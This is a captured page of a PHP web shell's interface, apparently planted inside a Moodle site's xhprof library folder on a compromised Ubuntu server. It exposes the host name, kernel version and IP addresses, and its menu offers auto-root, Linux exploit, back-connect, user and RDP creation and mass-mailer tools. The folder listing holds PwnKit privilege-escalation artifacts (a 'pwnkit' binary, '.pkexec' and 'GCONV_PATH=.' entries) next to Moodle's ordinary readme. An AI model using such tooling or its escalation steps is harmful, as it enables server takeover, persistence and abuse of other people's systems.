Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
lib /
xhprof /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
xhprof_html
[ DIR ]
drwxrwxrwx
xhprof_lib
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
CHANGELOG
3.28
KB
-rwxrwxrwx
CREDITS
266
B
-rwxrwxrwx
LICENSE
9.94
KB
-rwxrwxrwx
README
186
B
-rwxrwxrwx
index.html
0
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
readme_moodle.txt
2.07
KB
-rwxrwxrwx
xhprof_moodle.php
33.76
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme_moodle.txt
Description of XHProf 0.9.2 library/viewer import into Moodle Removed (commit #1): * .arcconfig - Definitions for arcanist/phabricator removed completely * composer.json - Composer's definition removed completely * examples - examples dir removed completely * extension - extension dir removed completely * package.xml - PECL package definition removed completely * xhprof_html/docs - documentation dir removed completely Added (commit #2 - always taken from current moodle.git master): * index.html - prevent directory browsing on misconfigured servers * xhprof_moodle.php - containing all the stuff needed to run the xhprof profiler within Moodle * readme_moodle.txt - this file ;-) Our changes: Look for "moodle" in code (commit #3 - always mimic from current moodle.git master): * xhprof_html/index.php ----| * xhprof_html/callgraph.php -|=> Changed to use own DB iXHProfRuns implementation (moodle_xhprofrun) * xhprof_html/typeahead.php -| * xhprof_html/css/xhprof.css: Minor tweaks to report styles * xhprof_lib/utils/callgraph_utils.php: Modified to use $CFG->pathtodot TODO: * with the 3 reports (index, callgraph and typeahead), close seesion asap, so user can continue working with moodle while the report (specially the graph is being generated). * improvements to the listing mode: various commodity details like: - allow to filter by various criteria - inline (and ajax) editing of reference/comment and deleting - whatever daily usage discovers ;-) * add new settings to control if we want to profile things like: - php functions - memory - cpu times (all them are right now enabled for everybody by default) * allow multiple runs to be exported together (right now only ONE can be exported at a time). Note it is only an UI restriction, backend supports multiple. 20101122 - MDL-24600 - Eloy Lafuente (stronk7): Original import of 0.9.2 release 20110318 - MDL-26891 - Eloy Lafuente (stronk7): Implemented earlier profiling runs 20130621 - MDL-39733 - Eloy Lafuente (stronk7): Export & import of profiling runs
Close